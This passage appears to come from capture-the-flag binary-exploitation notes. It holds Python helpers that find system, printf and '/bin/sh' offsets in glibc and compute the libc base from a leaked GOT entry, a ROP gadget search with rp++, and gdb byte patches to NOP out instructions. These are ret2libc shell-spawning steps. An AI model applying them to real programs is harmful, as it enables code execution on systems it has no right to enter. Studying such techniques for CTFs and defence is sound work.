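   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
"""
STRINGS_OUT = "15f5db /bin/sh\n"

# readelf -s columns: Num: Value Size Type Bind Vis Ndx Name
SYM_RE = re.compile(r"^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+FUNC\s+\S+\s+\S+\s+\S+\s+(\S+)$", re.M)

def symbol_offset(readelf_text, name):
    """Offset of a FUNC symbol by exact name (version suffix ignored)."""
    for value, sym in SYM_RE.findall(readelf_text):
        if sym.split("@")[0] == name:
            return int(value, 16)
    raise KeyError(name)

def string_offset(strings_text, needle):
    """Offset of an exact string from `strings -a -tx` output."""
    for line in strings_text.splitlines():
        off, _, text = line.partition(" ")
        if text == needle:
            return int(off, 16)
    raise KeyError(needle)

def resolve_from_leak(leak, offsets):
    """Turn the 4 leaked bytes of printf's GOT slot into the libc base and absolute
    addresses for every entry in `offsets` (which must include 'printf')."""
    if len(leak) < 4:
        raise ValueError("leak is shorter than one 32-bit address")
    base = struct.unpack("<I", leak[:4])[0] - offsets["printf"]
    if base & 0xFFF:
        raise ValueError("base 0x%x is not page-aligned: wrong libc build or offsets" % base)
    return {"base": base, **{k: base + v for k, v in offsets.items()}}
```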

 

[ Finding gadgets ]

 

https://github.com/0vercl0k/rp

 

#./rp++ -f ./pwn2 -r 4 | grep 'pop'
# 0x0804864e: pop edi ; pop ebp ; ret  ;  (1 found)
ppr = p32(0x0804864E)  # two arguments to clear off the stack, so a pop; pop; ret gadget

 

[ gdb code patch ]

 

(gdb) set *(unsigned char*)0x400cc3 = 0x90
(gdb) set *(unsigned char*)0x400cc4 = 0x90
(gdb) set *(unsigned char*)0x400ccd = 0x90
(gdb) set *(unsigned char*)0x400cce = 0x90
(gdb) set *(unsigned char*)0x400cd7 = 0x90
(gdb) set *(unsigned char*)0x400cd8 = 0x90
(gdb) disas main 
